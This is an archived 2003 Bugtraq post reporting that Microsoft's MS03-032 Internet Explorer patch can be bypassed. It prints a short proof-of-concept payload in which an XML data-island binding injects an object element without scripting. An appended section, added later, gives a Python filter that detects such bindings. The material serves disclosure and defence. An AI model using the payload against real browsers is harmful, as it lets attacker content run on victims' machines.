Bugtraq mailing list archives

RE: BAD NEWS: Microsoft Security Bulletin MS03-032


From: "GreyMagic Software" <security () greymagic com>
Date: Mon, 8 Sep 2003 16:52:12 +0200

The patch for Drew's object data=funky.hta doesn't work:

This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.

1. Disable Active Scripting

This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.
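
Added example, not part of the original post and not GreyMagic's code: a content-filter check for the path described above, where a dataformatas="html" binding pulls an object element out of an XML data island instead of static HTML. The function names, sample pages and placeholder values are constructed for this illustration.

```python
import html
import re

# Regex-based on purpose, so the check does not depend on HTML parser quirks.
TAG_RE = re.compile(r"<(?!/)[a-z][^>]*>", re.I)
ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
ISLAND_RE = re.compile(r"<xml\b([^>]*)>(.*?)</xml\s*>", re.I | re.S)
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
OBJECT_RE = re.compile(r"<\s*object\b", re.I)

def attrs(tag_text):
    """Lowercased attribute dict for one start tag (quoted or bare values)."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag_text)}

def island_text(body):
    """Text a binding would render: CDATA content plus entity-decoded text nodes."""
    text_nodes = re.sub(r"<[^>]*>", "", CDATA_RE.sub("", body))
    return "".join(CDATA_RE.findall(body)) + html.unescape(text_nodes)

def find_bound_objects(page):
    """Return (tag, island_id) for each dataformatas="html" binding whose
    data island carries an object element in its text content."""
    islands = {}
    for m in ISLAND_RE.finditer(page):
        island_id = attrs("<xml" + m.group(1) + ">").get("id")
        if island_id:
            islands[island_id.lower()] = island_text(m.group(2))
    hits = []
    for m in TAG_RE.finditer(page):
        a = attrs(m.group(0))
        src = a.get("datasrc", "")
        if a.get("dataformatas", "").lower() != "html" or not src.startswith("#"):
            continue
        if OBJECT_RE.search(islands.get(src[1:].lower(), "")):
            hits.append((m.group(0)[1:].split()[0].lower(), src[1:]))
    return hits

# Constructed sample pages (placeholder names and values, not taken from the post).
FLAGGED = ('<span datasrc="#feed" datafld="item" dataformatas="html"></span>'
           '<xml id="feed"><rows><item><![CDATA[<object data="placeholder">'
           '</object>]]></item></rows></xml>')
BENIGN = ('<span datasrc="#feed" datafld="item" dataformatas="html"></span>'
          '<xml id="feed"><rows><item><![CDATA[<b>hello</b>]]></item></rows></xml>')

if __name__ == "__main__":
    print(find_bound_objects(FLAGGED), find_bound_objects(BENIGN))
```

The check scans the whole island rather than only the field named in datafld, so it errs toward flagging.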


